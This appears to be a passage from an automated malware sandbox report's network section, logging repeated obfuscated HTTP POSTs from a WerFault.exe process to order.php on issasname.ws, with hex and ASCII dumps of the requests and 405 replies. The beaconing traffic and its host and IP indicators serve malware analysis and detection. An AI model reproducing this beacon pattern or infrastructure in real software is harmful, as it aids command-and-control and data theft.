                      Host: issasname.ws
                      Content-Length: 1062
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:50.129240036 CET | 166 | OUT | Data Ascii: aggmmssy=1373a98159cc9821467a1ed7114bb7b08e6b0246c215d9230a4981f792731c046712e9&ycaecg=47637092&ckmu=F9FFADF4B26CAD89030215419BD580003BECA43F25275ECC628C40CEBF22173B19D074E78EBD866AF436DF64F050017D573BD1FC5BF41C2209E85D72F7CA8C6F559281ED9D1D80
                      Dec 5, 2022 12:47:50.300355911 CET | 166 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:50 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      11 | 192.168.2.5 | 49702 | 64.70.19.203 | 80 | C:\Windows\SysWOW64\WerFault.exe
                      Timestamp | kBytes transferred | Direction | Data
                      Dec 5, 2022 12:47:53.551372051 CET | 168 | OUT | POST /xyz/abc/order.php?page=38 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1040
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:53.551389933 CET | 169 | OUT | Data Ascii: dgpsb=146f49acb790d6de23f016e5420745&bcjkrstab=67880549&fkvalqv=6722BC7A974653E6BBED11DDF1F228377A9A8985D968B8E2863628DC44D605EF0384F19399C8B77BFB295E096F27F541E7B63AB2E8396347F03B8F9B5A10DD54B2FE68CE719465A820F3C07DAC7F07F6B5F68A476F11B953B73
                      Dec 5, 2022 12:47:53.722367048 CET | 169 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:53 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:54.752098083 CET | 170 | OUT | POST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1018
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:54.752161026 CET | 171 | OUT | Data Ascii: vwxstuvqr=F55FD32DBF6D196BC0&tsrkjih=44194413&xadad=F478484673C2CD176235F36991F3AF975E2986111EB456A8857D4B6071F2CCFE846EA978A60684F7CA0AFE54AE5ECD91AADF9AA5A1C5B6756D052079CC2FA86E344C770CF7D186928330A0BAB710C8E121611FBB322A349543274E5F3113B9C
                      Dec 5, 2022 12:47:54.923067093 CET | 171 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:54 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:55.956294060 CET | 172 | OUT | POST /xyz/abc/order.php?pid=925 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1046
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:55.956346035 CET | 173 | OUT | Data Ascii: dmpybkt=4554b8a4e10cdf738e156b00a5207d0372dba16607122fcb844443fc&bijqr=40713589&fqvglwhmx=68b083e2bf3bb7d355d3b392c114b060d1f23df56c644ab0411006c6d38725fafc1aac6662ac7033776e1ddd9fb56280bbc91689ad9c5efb22ea10858b2d542e471c5b18a108b2c8e583fb208
                      Dec 5, 2022 12:47:56.127250910 CET | 173 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:56 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      12 | 192.168.2.5 | 49703 | 64.70.19.203 | 80 | C:\Windows\SysWOW64\WerFault.exe
                      Timestamp | kBytes transferred | Direction | Data
                      Dec 5, 2022 12:47:59.480753899 CET | 174 | OUT | POST /xyz/abc/order.php?id=575573 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1078
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:59.480783939 CET | 176 | OUT | Data Ascii: jsbktclud=4E231C6790C51DF3374C6A1B54154EB48104FDA291C10EE0EF3F929F63EEF76EC7029E1483421C&hovcjqx=67662657&lwhsd=B7A7CA937E827038BBDF8713AB02CB820C1D0FCD28C83689E851C9CCF8E6C7333CC04FDC74946E5CAD4EF87D2AF55AF596C3FD19131DD4E58F37BE5CEC93E5A4BDC
                      Dec 5, 2022 12:47:59.688416004 CET | 176 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:59 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:48:00.735136032 CET | 177 | OUT | POST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1078
                      Cache-Control: no-cache
                      Dec 5, 2022 12:48:00.735136032 CET | 178 | OUT | Data Ascii: huhuhuhuh=0750bb46267bf57b0ae34294f145e1b235a230aa9fd0ed686195f75a2278497d95e7efbde83752&fqbmxit=66311751&jyncr=ba161f42383abc1688d35a1b130f2cf6cbadaab980ce7c3d5453b7fd0c861cc56691d30af54357728aac3dcb5ce600ab017e836aa7b338ab7116e1cb828ae6edaa3
                      Dec 5, 2022 12:48:00.906112909 CET | 178 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:48:00 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:48:01.952442884 CET | 179 | OUT | POST /xyz/abc/order.php?id=8314615 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1040
                      Cache-Control: no-cache
                      Dec 5, 2022 12:48:01.953716993 CET | 180 | OUT | Data Ascii: wyacegik=85403326&ycgk=e74181744ab3f0268de78d1e870be46cbc4b97&agmsye=5E211C21035BF692B39832CCC7D2FAD196EBBA17A082084A244588AAEF0D73D7C3E2F38F633B67E395845EB420D6B65D629266AE970B5110141E9F4B2AD2E6816B8F384B287960339548B4D98734C2FD2476ED4E3BD978
                      Dec 5, 2022 12:48:02.123313904 CET | 180 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:48:02 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      13 | 192.168.2.5 | 49704 | 64.70.19.203 | 80 | C:\Windows\SysWOW64\WerFault.exe
                      Timestamp | kBytes transferred | Direction | Data
                      Dec 5, 2022 12:48:05.503144026 CET | 181 | OUT | POST /xyz/abc/order.php?id=5889637 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1056
                      Cache-Control: no-cache
                      Dec 5, 2022 12:48:05.503209114 CET | 182 | OUT | Data Ascii: rizqhyvmd=7DE7A8FA10AA1B1ED1104EE41243FF0D079B2D0647CDC7DEF58CEE8E&petixmh=60150873&tmfyr=07274c22d7fc9e2821e733976684185468059d1b009316c28b7fd60ccd55463cec06ed5121982edcc2aa72044585a6e345cf0590b1f5021e290942175734c4420d3986c20d6de158618ad3f20
                      Dec 5, 2022 12:48:05.674633980 CET | 183 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:48:05 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      2 | 192.168.2.5 | 49693 | 64.70.19.203 | 80 | C:\Windows\SysWOW64\WerFault.exe
                      Timestamp | kBytes transferred | Direction | Data
                      Dec 5, 2022 12:46:58.298151016 CET | 109 | OUT | POST /xyz/abc/order.php?id=1637135 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1025
                      Cache-Control: no-cache
                      Dec 5, 2022 12:46:58.298513889 CET | 111 | OUT | Data Ascii: qgwm=dfb4b8332d2a842fc6b3981c&ocqesgui=2346040&skcume=83980449A467C0CF82464F58FBF82E5AFEB63496C9B80BB98C353173AD717EBA8E39CE0C9F36D545982EA8D4B75F69BC70CE2572AC8157BF8D8F6F8F323529BC40A20BE2047A855704A7D9208EEF3447BE59DD4B65156951F285A1C6EB4C1
                      Dec 5, 2022 12:46:58.470284939 CET | 111 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:46:58 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      3192.168.2.54969464.70.19.20380C:\Windows\SysWOW64\WerFault.exe
                      TimestampkBytes transferredDirectionData
                      Dec 5, 2022 12:47:01.737490892 CET112OUTPOST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1032
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:01.737490892 CET113OUTData Raw: 6f 63 71 65 79 6d 61 6f 3d 34 39 37 34 45 41 37 43 32 38 36 33 37 45 43 35 37 33 38 45 39 36 37 34 30 45 32 39 31 44 46 30 31 46 37 30 39 45 41 31 26 6d 79 6b 77 6f 61 3d 37 30 38 39 37 34 34 32 26 71 67 77 6d 3d 65 66 37 34 34 33 37 33 62 61 34
                      Data Ascii: ocqeymao=4974EA7C28637EC5738E96740E291DF01F709EA1&mykwoa=70897442&qgwm=ef744373ba4b89db020650d8ef2e6adc8f61e5eb5f737f3ae60a45858ac07877b150a2de07c55095c71cf7f0a9364d8a3dcd1cd8870b8b7f0dca58dc58ba029ce03cce7536673ed8baf5d4117c4dbdc7010bb66e4a21
                      Dec 5, 2022 12:47:01.909091949 CET114INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:01 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:02.958908081 CET114OUTPOST /xyz/abc/order.php?id=7277094 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1062
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:02.959630966 CET115OUTData Raw: 70 6b 7a 75 70 65 7a 3d 38 37 32 43 37 36 43 34 42 37 46 37 46 38 42 33 30 44 30 43 45 38 43 36 42 38 32 33 43 36 33 33 31 41 38 42 31 32 30 35 41 46 30 33 43 41 38 33 30 33 45 41 31 31 31 36 41 34 42 39 30 32 36 41 45 30 32 45 35 31 43 45 26 6e
                      Data Ascii: pkzupez=872C76C4B7F7F8B30D0CE8C6B823C6331A8B1205AF03CA8303EA1116A4B9026AE02E51CE&ngtmf=71781835&rofczqnkb=7BC7C06E02185D2E29AA77F9598DD93EF4F8DE34E5B53B78004491285A0D576020B8D775D6D933FF887E6C72F8F2F9E350BC227E6BAD27135711087A6BFC4FBBE433806C5
                      Dec 5, 2022 12:47:03.130175114 CET116INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:03 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:04.219546080 CET | 116 | OUT | POST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1050
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:04.219605923 CET | 118 | OUT | Data Raw: 7a 65 6a 6f 74 79 64 69 6e 3d 33 44 43 45 39 37 41 30 39 43 44 38 42 35 45 34 44 32 44 37 39 46 43 32 31 41 44 42 46 45 35 34 43 30 34 36 43 35 44 32 33 30 31 36 30 43 44 32 46 45 26 78 61 64 67 6a 6d 70 3d 33 38 36 31 35 36 31 33 26 62 69 70 77
                      Data Ascii: zejotydin=3DCE97A09CD8B5E4D2D79FC21ADBFE54C046C5D230160CD2FE&xadgjmp=38615613&bipwd=eb25a9741db4ab24db898ffddb108f4d05c17c1bc180461ba9fa0e6522d2e271befbbb05795ca41d422eb562948e179e8153e852a46f9911be012b10132436c6b7f213e6bf5a665b120854fd0340803
                      Dec 5, 2022 12:47:04.544121981 CET | 118 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:04 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      4 | 192.168.2.5 | 49695 | 64.70.19.203 | 80 | C:\Windows\SysWOW64\WerFault.exe
                      Timestamp | kBytes transferred | Direction | Data
                      Dec 5, 2022 12:47:09.385588884 CET | 119 | OUT | POST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1022
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:09.385744095 CET | 120 | OUT | Data Raw: 71 6d 69 65 3d 33 32 32 33 30 35 36 36 26 73 71 6f 6d 65 63 3d 33 36 42 34 44 46 38 37 37 31 46 45 46 46 33 46 45 45 38 38 41 30 31 37 34 32 35 41 38 31 46 43 39 33 43 34 31 39 46 44 26 75 75 75 75 6f 6f 6f 6f 3d 38 45 41 36 46 46 36 45 46 31 38
                      Data Ascii: qmie=32230566&sqomec=36B4DF8771FEFF3FEE88A017425A81FC93C419FD&uuuuoooo=8EA6FF6EF18DF106912CDC2D676BA722FE815937D5DA648470870403FAAE297BBAEE8216DF7FA9BB7C84B03C355743076438EE42BF36FD8DB56492CE9595641AD9560C950A92C913FA1431A1EB59A17CEE9F9925135F
                      Dec 5, 2022 12:47:09.799597025 CET | 121 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:09 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:11.178157091 CET | 121 | OUT | POST /xyz/abc/order.php?id=4981026 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1086
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:11.178157091 CET | 122 | OUT | Data Raw: 6e 67 7a 73 6c 65 78 71 6a 3d 39 32 32 36 37 37 35 39 26 70 6b 66 61 76 3d 35 37 64 36 37 34 31 32 38 64 37 36 39 38 61 35 39 61 66 64 39 30 37 36 35 66 37 65 30 38 34 64 31 33 36 63 38 32 61 65 66 37 32 65 34 64 38 39 35 66 62 30 30 36 35 30 34
                      Data Ascii: ngzslexqj=92267759&pkfav=57d674128d7698a59afd90765f7e084d136c82aef72e4d895fb006504dc22de2ff4790521070&rolifcz=1e7bd3652b04265c6f056057070faed16b5dd87fe37f46e7f1aa472a2e139f6daa69940fd66ec02f67bb28d24fbee36ee48909c134bca9ebedec799ef34378d7a11a8
                      Dec 5, 2022 12:47:11.349355936 CET | 123 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:11 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:12.620984077 CET | 123 | OUT | POST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1025
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:12.621218920 CET | 124 | OUT | Data Raw: 64 67 6a 73 76 79 68 3d 42 43 32 42 42 39 43 42 45 36 35 46 43 44 43 45 42 35 30 33 43 45 37 34 45 33 45 36 33 43 45 46 31 46 31 33 26 62 63 64 6b 6c 3d 36 38 34 37 37 39 35 26 66 6b 70 61 66 6b 76 61 66 3d 64 34 36 64 31 33 30 31 39 37 34 63 38
                      Data Ascii: dgjsvyh=BC2BB9CBE65FCDCEB503CE74E3E63CEF1F13&bcdkl=6847795&fkpafkvaf=d46d1301974c8792230fc49c624247c23a464b3887b4e9512dfe149e31f0b44139361242d07a3edd4dd329db8476d83676a0ed4df52a81f450e383251593cadd92b948a78a284dce70c472d6d918dc60bc6b68b5628ff6
                      Dec 5, 2022 12:47:12.792326927 CET | 125 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:12 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      5 | 192.168.2.5 | 49696 | 64.70.19.203 | 80 | C:\Windows\SysWOW64\WerFault.exe
                      Timestamp | kBytes transferred | Direction | Data
                      Dec 5, 2022 12:47:16.077326059 CET | 126 | OUT | POST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1068
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:16.077361107 CET | 127 | OUT | Data Raw: 6e 61 6e 61 74 67 74 67 74 3d 37 32 65 66 33 63 62 63 37 39 65 64 30 34 35 37 32 32 62 37 61 33 66 31 30 64 33 36 66 61 36 38 64 64 31 63 32 65 63 66 33 36 34 64 38 36 37 61 37 31 32 62 33 30 63 64 36 62 62 61 39 37 36 33 37 64 33 30 26 6c 77 68
                      Data Ascii: nanatgtgt=72ef3cbc79ed045722b7a3f10d36fa68dd1c2ecf364d867a712b30cd6bba97637d30&lwhsjuf=78145233&petid=96b9753ee4c608b817f6e8570a6da00f4e6e8dc13ffd566510e5ed1b8db26514cd7e898850db097d4ce8528a9ef8898654893cd92ac552983dfd4977e0d464d189c36e31a130c
                      Dec 5, 2022 12:47:16.248684883 CET | 127 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:16 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:17.283337116 CET | 128 | OUT | POST /xyz/abc/order.php?page=69 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1048
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:17.283370972 CET | 129 | OUT | Data Raw: 6b 75 65 6f 3d 39 32 64 64 65 31 61 39 37 31 31 32 35 64 31 62 65 61 36 65 37 35 65 37 30 64 34 61 31 38 65 30 64 37 65 30 33 38 65 35 35 33 36 32 65 33 26 69 71 79 67 6f 77 65 6d 3d 37 36 39 31 34 37 33 36 26 6d 79 6b 77 69 75 3d 34 36 46 34 41
                      Data Ascii: kueo=92dde1a971125d1bea6e75e70d4a18e0d7e038e55362e3&iqygowem=76914736&mykwiu=46F4A717002D59271D29E4C928478FF8ED7445089A1C3034C106E89F79C004500AD4F20ECBC0CC41E13C47B9F9945399158168B9112DB3F6C4AC7437F49D1ACE49205B2519CB5C6115089DB103A04C653678CE
                      Dec 5, 2022 12:47:17.454430103 CET | 129 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:17 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
